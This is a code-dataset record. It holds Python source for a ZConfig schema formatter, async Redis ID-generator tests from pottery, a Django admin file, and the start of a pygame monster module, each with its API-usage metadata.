"usage_type": "call"}, {"api_name": "tensorflow.compat.v1.Session", "line_number": 46, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.train.Saver", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.train", "line_number": 50, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.global_variables_initializer", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.disable_eager_execution", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 63, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.placeholder", "line_number": 65, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 65, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.placeholder", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.variable_scope", "line_number": 67, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.GraphKeys.GLOBAL_VARIABLES", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.GraphKeys", "line_number": 69, "usage_type": "name"}, {"api_name": "tensorflow.random_normal_initializer", "line_number": 71, "usage_type": "call"}, {"api_name": "tensorflow.constant_initializer", "line_number": 72, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.variable_scope", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.get_variable", "line_number": 75, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.get_variable", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.nn.relu", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 77, "usage_type": "attribute"}, {"api_name": "tensorflow.matmul", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.variable_scope", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.get_variable", "line_number": 80, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.get_variable", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.variable_scope", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 84, "usage_type": "call"}, {"api_name": "tensorflow.math.squared_difference", "line_number": 84, "usage_type": "call"}, {"api_name": "tensorflow.math", "line_number": 84, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.variable_scope", "line_number": 85, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.train.AdagradOptimizer", "line_number": 87, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 87, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.placeholder", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 90, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.variable_scope", "line_number": 91, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.GraphKeys.GLOBAL_VARIABLES", "line_number": 93, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.GraphKeys", "line_number": 93, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.variable_scope", "line_number": 96, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.get_variable", "line_number": 97, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.get_variable", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.nn.relu", "line_number": 99, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 99, "usage_type": "attribute"}, {"api_name": "tensorflow.matmul", "line_number": 99, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.variable_scope", "line_number": 102, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.get_variable", "line_number": 103, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.get_variable", "line_number": 104, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 121, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 131, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 136, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 137, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.get_collection", "line_number": 141, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.get_collection", "line_number": 142, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.assign", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 153, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 155, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 169, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 175, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 193, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 194, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 194, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 196, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 206, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 208, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 208, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 209, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 209, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 210, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 210, "usage_type": "name"}, {"api_name": "numpy.save", "line_number": 216, "usage_type": "call"}]} +{"seq_id": "4634559618", "text": "import argparse\nimport itertools\nimport sys\nimport textwrap\nfrom abc import ABC\nfrom abc import abstractmethod\nfrom itertools import filterfalse\n\nimport ZConfig.loader\nfrom ZConfig.datatypes import null_conversion\nfrom ZConfig.info import AbstractType\nfrom ZConfig.info import MultiKeyInfo\nfrom ZConfig.info import SectionInfo\nfrom ZConfig.info import SectionType\nfrom ZConfig.info import ValueInfo\n\n\nMARKER = object()\n\n\nclass _VisitorBuilder:\n\n def __init__(self):\n self.visitors = []\n\n def __call__(self, Type):\n def dec(func):\n self.visitors.append((Type, func))\n return func\n return dec\n\n\nclass AbstractSchemaFormatter(ABC):\n\n def __init__(self, schema, stream=None):\n self.stream = stream or sys.stdout\n self._dt = schema.registry.find_name\n\n def write(self, *args):\n print(*args, file=self.stream)\n\n @abstractmethod\n def esc(self, x):\n \"Escape blocks of text if needed\"\n\n def _dedent(self, text):\n # dedent the text to avoid producing unwanted\n # definition lists. The XML parser strips leading whitespace from\n # the first line, but preserves it for subsequent lines, so for dedent\n # to work we have to ignore that first line.\n texts = text.split(\"\\n\")\n if len(texts) > 1:\n trail = textwrap.dedent('\\n'.join(texts[1:]))\n text = texts[0] + '\\n' + trail\n return text\n\n @abstractmethod\n def item_list(self):\n \"Context manager for listing description items\"\n\n def _describing(self, description, after):\n if description is not MARKER:\n with self.described_as():\n self.description(description)\n if after:\n after()\n\n @abstractmethod\n def describing(self, description=MARKER, after=None):\n \"description term, optional body\"\n\n def describing_name(self, concrete_name,\n description=MARKER, datatype=None,\n **kwargs):\n with self.describing(description):\n self.concrete_name(concrete_name)\n self.datatype(datatype)\n\n for k, v in sorted(kwargs.items()):\n if v:\n self.write(self.esc(\"({}: {})\".format(k, v)))\n\n def description(self, description):\n if description:\n self.write(self.esc(description))\n\n example = description\n\n @abstractmethod\n def described_as(self):\n \"Description body context manager\"\n\n @abstractmethod\n def abstract_name(self, name):\n \"Abstract name\"\n\n @abstractmethod\n def concrete_name(self, *name):\n \"Concrete name\"\n\n @abstractmethod\n def concrete_section_name(self, *name):\n \"Name of a section a user can type in a config\"\n\n def datatype(self, datatype):\n self.write(\"(%s)\" % self._dt(datatype))\n\n @abstractmethod\n def body(self):\n \"Context manager for the whole document\"\n\n\nclass AbstractSchemaPrinter(ABC):\n\n def __init__(self, schema, stream=None,\n allowed_names=(), excluded_names=()):\n self.schema = schema\n stream = stream or sys.stdout\n self._explained = set()\n self._seen_typenames = set()\n self.fmt = self._schema_formatter(schema, stream)\n\n def _make_predicate(names):\n names = {x.lower() for x in names}\n\n def predicate(name_info):\n name, _ = name_info\n return name and name.lower() in names\n\n return predicate\n\n def _make_filter(names, filt):\n iter_all = self._iter_schema_items\n pred = _make_predicate(names)\n\n def it():\n return filt(pred, iter_all())\n\n return it\n\n if allowed_names:\n self._iter_schema_items = _make_filter(allowed_names, filter)\n\n if excluded_names:\n excluded_names = {x.lower() for x in excluded_names}\n self._iter_schema_items = _make_filter(excluded_names, filterfalse)\n self._included = lambda st: st.name not in excluded_names\n\n @abstractmethod\n def _schema_formatter(self, schema, stream):\n \"Return a formatter\"\n\n def _included(self, st):\n return True\n\n def _explain(self, st):\n if st.name in self._explained:\n return\n\n self._explained.add(st.name)\n\n self.fmt.description(st.description)\n if not self._included(st):\n return\n\n self.fmt.example(getattr(st, 'example', None))\n\n for sub in st.getsubtypenames():\n with self.fmt.item_list():\n self.visit(None, st.getsubtype(sub))\n\n def _iter_schema_items(self):\n def everything():\n return itertools.chain(self.schema.itertypes(),\n self.schema)\n # The abstract types tend to be the most important. Since we\n # only document a concrete type the first time we find it, and\n # we can find extensions of abstract types beneath the abstract\n # type which is itself buried under a concrete section, all the\n # different permutations would be only documented once under\n # that section. By exposing these first, they get documented at\n # the top-level, and each concrete section that uses the\n # abstract type gets a reference to it.\n\n def abstract_sections(base):\n for name, info in base:\n if isinstance(info, SectionInfo):\n if info.sectiontype.isabstract():\n yield name, info\n\n # XXX: This isn't catching everything. Witness the\n # relstorage component.\n elif isinstance(info, SectionType):\n yield from abstract_sections(info)\n return itertools.chain(abstract_sections(everything()), everything())\n\n def printSchema(self):\n # side-effect of building may be printing\n self.buildSchema()\n\n def buildSchema(self):\n seen = set() # prevent duplicates at the top-level\n # as we find multiple abstract types\n with self.fmt.body():\n with self.fmt.item_list():\n for name, info in self._iter_schema_items():\n if info in seen:\n continue\n seen.add(info)\n self.visit(name, info)\n\n TypeVisitor = _VisitorBuilder()\n visitors = TypeVisitor.visitors\n\n def visit(self, name, info):\n for t, f in self.visitors:\n if isinstance(info, t):\n f(self, name, info)\n break\n else:\n self._visit_default(name, info)\n\n @TypeVisitor(SectionType)\n def _visit_SectionType(self, name, info):\n if info.name in self._seen_typenames:\n return\n self._seen_typenames.add(info.name)\n with self.fmt.describing():\n if info.datatype is not null_conversion:\n self.fmt.concrete_section_name(info.name)\n else:\n self.fmt.abstract_name(info.name)\n self.fmt.datatype(info.datatype)\n\n with self.fmt.described_as():\n self.fmt.description(info.description)\n self.fmt.example(info.example)\n\n with self.fmt.item_list():\n for sub in info:\n self.visit(*sub)\n\n @TypeVisitor(SectionInfo)\n def _visit_SectionInfo(self, name, info):\n st = info.sectiontype\n if st.isabstract():\n with self.fmt.describing(info.description,\n lambda: self._explain(st)):\n self.fmt.abstract_name(st.name)\n self.fmt.concrete_name(info.name)\n\n else:\n with self.fmt.describing():\n self.fmt.concrete_section_name(info.attribute, info.name)\n self.fmt.datatype(info.datatype)\n\n with self.fmt.described_as():\n with self.fmt.item_list():\n for sub in info.sectiontype:\n self.visit(*sub)\n\n self.fmt.example(info.example)\n\n @TypeVisitor(AbstractType)\n def _visit_AbstractType(self, name, info):\n with self.fmt.describing(info.description,\n lambda: self._explain(info)):\n self.fmt.abstract_name(info.name)\n\n def _visit_default(self, name, info):\n # KeyInfo or MultiKeyInfo\n default = info.getdefault()\n if isinstance(default, ValueInfo):\n default = default.value\n\n name = info.name\n if isinstance(info, MultiKeyInfo):\n name = name + \" (*)\"\n self.fmt.describing_name(name, info.description, info.datatype,\n default=default, metadefault=info.metadefault)\n\n del TypeVisitor\n\n\ndef load_schema(schema, package=None):\n \"\"\"\n Load the *schema* and return the schema object.\n\n By default, *schema* is interpreted as a path on disk to a schema\n file.\n\n If *package* is set to a non-empty string, then *package* must\n name a Python package, and the file in *schema* will be loaded\n from that package. The *schema* can either refer to a component\n definition (e.g., ``components.xml``) or to a schema.\n \"\"\"\n\n if not package:\n # A schema file\n schema_reader = argparse.FileType('r')(schema)\n return ZConfig.loader.loadSchemaFile(schema_reader)\n\n try:\n # A component in a package\n schema_template = (\n \"\"\n % (package, schema))\n from io import StringIO\n return ZConfig.loader.loadSchemaFile(StringIO(schema_template))\n except ZConfig.UnknownDocumentTypeError:\n # Ok, not parseable as a component. Try a simple schema.\n return ZConfig.loader.loadSchema(f'package:{package}:{schema}')\n", "repo_name": "zopefoundation/ZConfig", "sub_path": "src/ZConfig/_schema_utils.py", "file_name": "_schema_utils.py", "file_ext": "py", "file_size_in_byte": 9919, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "61", "api": [{"api_name": "abc.ABC", "line_number": 33, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 36, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 42, "usage_type": "name"}, {"api_name": "textwrap.dedent", "line_number": 53, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 57, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 68, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 89, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 93, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 97, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 101, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 108, "usage_type": "name"}, {"api_name": "abc.ABC", "line_number": 113, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 118, "usage_type": "attribute"}, {"api_name": "itertools.filterfalse", "line_number": 146, "usage_type": "argument"}, {"api_name": "abc.abstractmethod", "line_number": 149, "usage_type": "name"}, {"api_name": "itertools.chain", "line_number": 174, "usage_type": "call"}, {"api_name": "ZConfig.info.SectionInfo", "line_number": 187, "usage_type": "argument"}, {"api_name": "ZConfig.info.SectionType", "line_number": 193, "usage_type": "argument"}, {"api_name": "itertools.chain", "line_number": 195, "usage_type": "call"}, {"api_name": "ZConfig.datatypes.null_conversion", "line_number": 229, "usage_type": "name"}, {"api_name": "ZConfig.info.SectionType", "line_number": 223, "usage_type": "argument"}, {"api_name": "ZConfig.info.SectionInfo", "line_number": 243, "usage_type": "argument"}, {"api_name": "ZConfig.info.AbstractType", "line_number": 264, "usage_type": "argument"}, {"api_name": "ZConfig.info.ValueInfo", "line_number": 273, "usage_type": "argument"}, {"api_name": "ZConfig.info.MultiKeyInfo", "line_number": 277, "usage_type": "argument"}, {"api_name": "argparse.FileType", "line_number": 300, "usage_type": "call"}, {"api_name": "ZConfig.loader.loader.loadSchemaFile", "line_number": 301, "usage_type": "call"}, {"api_name": "ZConfig.loader.loader", "line_number": 301, "usage_type": "attribute"}, {"api_name": "ZConfig.loader", "line_number": 301, "usage_type": "name"}, {"api_name": "ZConfig.loader.loader.loadSchemaFile", "line_number": 309, "usage_type": "call"}, {"api_name": "ZConfig.loader.loader", "line_number": 309, "usage_type": "attribute"}, {"api_name": "ZConfig.loader", "line_number": 309, "usage_type": "name"}, {"api_name": "io.StringIO", "line_number": 309, "usage_type": "call"}, {"api_name": "ZConfig.loader.UnknownDocumentTypeError", "line_number": 310, "usage_type": "attribute"}, {"api_name": "ZConfig.loader", "line_number": 310, "usage_type": "name"}, {"api_name": "ZConfig.loader.loader.loadSchema", "line_number": 312, "usage_type": "call"}, {"api_name": "ZConfig.loader.loader", "line_number": 312, "usage_type": "attribute"}, {"api_name": "ZConfig.loader", "line_number": 312, "usage_type": "name"}]} +{"seq_id": "177450072", "text": "'Async distributed Redis-powered monotonically increasing ID generator tests.'\n\n\nimport asyncio\nimport contextlib\nimport unittest.mock\n\nimport pytest\nfrom redis.asyncio import Redis as AIORedis\nfrom redis.commands.core import AsyncScript\nfrom redis.exceptions import TimeoutError\n\nfrom pottery import AIONextID\nfrom pottery import QuorumNotAchieved\n\n\n# TODO: When we drop support for Python 3.9, delete the following definition of\n# aiter().\ntry:\n aiter # type: ignore\nexcept NameError: # pragma: no cover\n def aiter(iterable):\n return iterable.__aiter__()\n\n# TODO: When we drop support for Python 3.9, delete the following definition of\n# anext().\ntry:\n anext # type: ignore\nexcept NameError: # pragma: no cover\n # I got this anext() definition from here:\n # https://github.com/python/cpython/blob/f4c03484da59049eb62a9bf7777b963e2267d187/Lib/test/test_asyncgen.py#L52\n _NO_DEFAULT = object()\n\n def anext(iterator, default=_NO_DEFAULT):\n try:\n __anext__ = type(iterator).__anext__\n except AttributeError:\n raise TypeError(f'{iterator!r} is not an async iterator')\n if default is _NO_DEFAULT:\n return __anext__(iterator)\n\n async def anext_impl():\n try:\n return await __anext__(iterator)\n except StopAsyncIteration:\n return default\n return anext_impl()\n\n\n@pytest.fixture\ndef aioids(aioredis: AIORedis) -> AIONextID: # type: ignore\n return AIONextID(masters={aioredis})\n\n\nasync def test_aionextid(aioids: AIONextID) -> None:\n for expected in range(1, 10):\n got = await anext(aioids) # type: ignore\n assert got == expected, f'expected {expected}, got {got}'\n\n\nasync def test_reset(aioids: AIONextID) -> None:\n assert await anext(aioids) == 1 # type: ignore\n await aioids.reset()\n assert await anext(aioids) == 1 # type: ignore\n\n\n@pytest.mark.parametrize('num_aioids', range(1, 6))\nasync def test_contention(num_aioids: int) -> None:\n dbs = range(1, 6)\n urls = [f'redis://localhost:6379/{db}' for db in dbs]\n masters = [AIORedis.from_url(url, socket_timeout=1) for url in urls]\n aioids = [AIONextID(key='tweet-ids', masters=masters) for _ in range(num_aioids)]\n\n try:\n coros = [anext(aioids[id_gen]) for id_gen in range(num_aioids)] # type: ignore\n tasks = [asyncio.create_task(coro) for coro in coros]\n done, _ = await asyncio.wait(tasks)\n results = []\n with contextlib.suppress(QuorumNotAchieved):\n for task in done:\n results.append(task.result())\n assert len(results) == len(set(results))\n # To see the following output, issue:\n # $ source venv/bin/activate; pytest -rP tests/test_aionextid.py::test_contention; deactivate\n print(f'{num_aioids} aioids, {results} IDs')\n\n finally:\n # Clean up for the next unit test run.\n await aioids[0].reset()\n\n\ndef test_slots(aioids: AIONextID) -> None:\n with pytest.raises(AttributeError):\n aioids.__dict__\n\n\ndef test_aiter(aioids: AIONextID) -> None:\n assert aiter(aioids) is aioids # type: ignore\n\n\nasync def test_anext_quorumnotachieved(aioids: AIONextID) -> None:\n aioredis = next(iter(aioids.masters))\n with pytest.raises(QuorumNotAchieved), \\\n unittest.mock.patch.object(aioredis, 'get') as get:\n get.side_effect = TimeoutError\n await anext(aioids) # type: ignore\n\n with pytest.raises(QuorumNotAchieved), \\\n unittest.mock.patch.object(AsyncScript, '__call__') as __call__:\n __call__.side_effect = TimeoutError\n await anext(aioids) # type: ignore\n\n\nasync def test_reset_quorumnotachieved(aioids: AIONextID) -> None:\n aioredis = next(iter(aioids.masters))\n with pytest.raises(QuorumNotAchieved), \\\n unittest.mock.patch.object(aioredis, 'delete') as delete:\n delete.side_effect = TimeoutError\n await aioids.reset()\n\n\ndef test_repr(aioids: AIONextID) -> None:\n assert repr(aioids) == ''\n", "repo_name": "brainix/pottery", "sub_path": "tests/test_aionextid.py", "file_name": "test_aionextid.py", "file_ext": "py", "file_size_in_byte": 4066, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 930, "dataset": "github-code", "pt": "61", "api": [{"api_name": "redis.asyncio.Redis", "line_number": 51, "usage_type": "name"}, {"api_name": "pottery.AIONextID", "line_number": 52, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pottery.AIONextID", "line_number": 51, "usage_type": "name"}, {"api_name": "pottery.AIONextID", "line_number": 55, "usage_type": "name"}, {"api_name": "pottery.AIONextID", "line_number": 61, "usage_type": "name"}, {"api_name": "redis.asyncio.Redis.from_url", "line_number": 71, "usage_type": "call"}, {"api_name": "redis.asyncio.Redis", "line_number": 71, "usage_type": "name"}, {"api_name": "pottery.AIONextID", "line_number": 72, "usage_type": "call"}, {"api_name": "asyncio.create_task", "line_number": 76, "usage_type": "call"}, {"api_name": "asyncio.wait", "line_number": 77, "usage_type": "call"}, {"api_name": "contextlib.suppress", "line_number": 79, "usage_type": "call"}, {"api_name": "pottery.QuorumNotAchieved", "line_number": 79, "usage_type": "argument"}, {"api_name": "pytest.mark.parametrize", "line_number": 67, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 67, "usage_type": "attribute"}, {"api_name": "pottery.AIONextID", "line_number": 92, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 93, "usage_type": "call"}, {"api_name": "pottery.AIONextID", "line_number": 97, "usage_type": "name"}, {"api_name": "pottery.AIONextID", "line_number": 101, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 103, "usage_type": "call"}, {"api_name": "pottery.QuorumNotAchieved", "line_number": 103, "usage_type": "argument"}, {"api_name": "unittest.mock.mock.patch.object", "line_number": 104, "usage_type": "call"}, {"api_name": "unittest.mock.mock", "line_number": 104, "usage_type": "attribute"}, {"api_name": "unittest.mock", "line_number": 104, "usage_type": "name"}, {"api_name": "redis.exceptions.TimeoutError", "line_number": 105, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 108, "usage_type": "call"}, {"api_name": "pottery.QuorumNotAchieved", "line_number": 108, "usage_type": "argument"}, {"api_name": "unittest.mock.mock.patch.object", "line_number": 109, "usage_type": "call"}, {"api_name": "redis.commands.core.AsyncScript", "line_number": 109, "usage_type": "argument"}, {"api_name": "unittest.mock.mock", "line_number": 109, "usage_type": "attribute"}, {"api_name": "unittest.mock", "line_number": 109, "usage_type": "name"}, {"api_name": "redis.exceptions.TimeoutError", "line_number": 110, "usage_type": "name"}, {"api_name": "pottery.AIONextID", "line_number": 114, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 116, "usage_type": "call"}, {"api_name": "pottery.QuorumNotAchieved", "line_number": 116, "usage_type": "argument"}, {"api_name": "unittest.mock.mock.patch.object", "line_number": 117, "usage_type": "call"}, {"api_name": "unittest.mock.mock", "line_number": 117, "usage_type": "attribute"}, {"api_name": "unittest.mock", "line_number": 117, "usage_type": "name"}, {"api_name": "redis.exceptions.TimeoutError", "line_number": 118, "usage_type": "name"}, {"api_name": "pottery.AIONextID", "line_number": 122, "usage_type": "name"}]} +{"seq_id": "14261098528", "text": "from django.contrib import admin\nfrom users.models import Follow, User\n\n\nclass UserAdmin(admin.ModelAdmin):\n list_display = (\n 'username',\n 'first_name',\n 'last_name',\n 'email'\n )\n search_fields = ('username', 'email')\n filter_horizontal = ('favorite_recipes',)\n list_filter = ('email', 'username')\n empty_value_display = '-пусто-'\n\n\nclass FollowAdmin(admin.ModelAdmin):\n list_display = (\n 'user',\n 'author'\n )\n search_fields = (\n 'user__username',\n 'user__email',\n 'user__first_name',\n 'author__username',\n 'author__email',\n 'author__first_name'\n )\n list_filter = ('author', 'user')\n\n\nadmin.site.register(User, UserAdmin)\nadmin.site.register(Follow, FollowAdmin)\n", "repo_name": "Gena40/foodgram-project-react", "sub_path": "backend/food_assistance/users/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 786, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 5, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 5, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 18, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 34, "usage_type": "call"}, {"api_name": "users.models.User", "line_number": 34, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 34, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 34, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 35, "usage_type": "call"}, {"api_name": "users.models.Follow", "line_number": 35, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 35, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 35, "usage_type": "name"}]} +{"seq_id": "11950358866", "text": "import pygame as pg\r\nimport Game\r\nimport My as my\r\nfrom Help import cut, crEvil, crFirework\r\nfrom Objects import Water\r\nfrom Bullets import FireBall\r\n\r\n\r\n\"\"\"Монстры\"\"\"\r\n\r\n\r\nclass Evil(pg.sprite.Sprite):\r\n\r\n volumeRun = Game.SOUND_VOLUME / 5\r\n maxWait = Game.TIME * 10\r\n \r\n def __init__(self, x, y):\r\n super().__init__(my.evil_group, my.all_sprites)\r\n self.direction = 'R'\r\n self.health = self.maxHealth\r\n self.wait = Evil.maxWait\r\n self.step = 0\r\n self.time = 0\r\n self.image = self.imageDied[self.direction]\r\n self.rect = self.image.get_rect().move(x * Game.CELL_SIZE,\r\n y * Game.CELL_SIZE)\r\n self.firework = None\r\n self.died = False\r\n \r\n def moving(self):\r\n # Перемещение\r\n x, y = Game.H_POS\r\n if y > self.rect.y:\r\n self.direction = 'D'\r\n self.rect.y += self.speed\r\n if y < self.rect.y:\r\n self.direction = 'U'\r\n self.rect.y -= self.speed\r\n if x > self.rect.x:\r\n self.direction = 'R'\r\n self.rect.x += self.speed\r\n if x < self.rect.x:\r\n self.direction = 'L'\r\n self.rect.x -= self.speed\r\n\r\n def to_hurt(self, damage):\r\n # Получение урона\r\n print(f\"{type(self).__name__}: -{damage} hp\")\r\n if my.sound:\r\n self.soundDamage.play()\r\n self.health -= damage\r\n if self.health <= 0:\r\n self.death()\r\n\r\n def setImage(self, style):\r\n # Смена кадра анимации\r\n if style == 'moving' or self.wait:\r\n if self.time == Game.TIME:\r\n if my.sound_run:\r\n self.soundRun.play() \r\n self.image = self.imageRun[self.direction][self.step]\r\n self.step = (\r\n self.step + 1) % len(self.imageRun[self.direction])\r\n self.time = 0\r\n else:\r\n self.time += 1\r\n elif style == 'fight':\r\n self.image = self.imageAttack[self.direction]\r\n self.time = 0\r\n\r\n def do(self):\r\n pass\r\n\r\n\r\nclass Pig(Evil):\r\n \r\n \"\"\"\r\n Свин:\r\n - Колет героя рогом\r\n - Разрушает всё на своём пути\r\n \"\"\"\r\n \r\n imageRun = {'R': cut(pg.image.load('data/pig/rightRun.png')),\r\n 'L': cut(pg.image.load('data/pig/leftRun.png')),\r\n 'U': cut(pg.image.load('data/pig/leftRun.png')),\r\n 'D': cut(pg.image.load('data/pig/leftRun.png')),\r\n }\r\n\r\n imageAttack = {'R': pg.image.load('data/pig/rightAttack.png'),\r\n 'L': pg.image.load('data/pig/leftAttack.png'),\r\n 'U': pg.image.load('data/pig/leftAttack.png'),\r\n 'D': pg.image.load('data/pig/leftAttack.png'),\r\n }\r\n\r\n imageDied = {'R': pg.image.load('data/pig/rightDied.png'),\r\n 'L': pg.image.load('data/pig/leftDied.png'),\r\n 'U': pg.image.load('data/pig/leftDied.png'),\r\n 'D': pg.image.load('data/pig/leftDied.png'),\r\n }\r\n\r\n soundRun = pg.mixer.Sound('data/sounds/pig/run.mp3')\r\n soundRun.set_volume(Evil.volumeRun)\r\n soundFight = pg.mixer.Sound('data/sounds/pig/fight.mp3')\r\n soundFight.set_volume(Game.SOUND_VOLUME)\r\n soundDamage = pg.mixer.Sound('data/sounds/pig/damage.mp3')\r\n soundDamage.set_volume(Game.SOUND_VOLUME)\r\n \r\n speed = 0.1 * Game.CELL_SIZE\r\n disRun = 10 * Game.CELL_SIZE\r\n disAttack = 3 * Game.CELL_SIZE\r\n disFight = Game.CELL_SIZE\r\n maxHealth = 5\r\n power = 2\r\n\r\n def move(self):\r\n # Действие\r\n if not self.wait:\r\n self.setImage('moving')\r\n self.backMoving()\r\n elif self.check(Pig.disFight):\r\n self.setImage('fight')\r\n self.fight()\r\n elif self.check(Pig.disAttack):\r\n self.setImage('fight')\r\n if my.sound:\r\n self.soundFight.play()\r\n self.attack()\r\n elif self.check(Pig.disRun):\r\n self.setImage('moving')\r\n self.moving()\r\n obj = pg.sprite.spritecollideany(self, my.objects)\r\n if obj:\r\n if obj.__class__ != 